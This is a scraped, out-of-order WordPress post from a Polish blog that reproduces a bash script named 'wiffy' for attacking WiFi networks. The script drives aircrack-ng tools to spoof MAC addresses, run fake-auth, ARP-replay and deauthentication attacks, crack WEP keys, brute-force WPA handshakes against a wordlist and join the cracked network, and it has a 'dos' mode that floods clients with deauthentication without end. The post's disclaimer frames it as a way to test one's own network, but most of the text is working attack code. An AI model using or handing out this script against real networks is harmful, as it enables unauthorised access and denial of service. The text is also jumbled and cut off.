$diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0010.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if 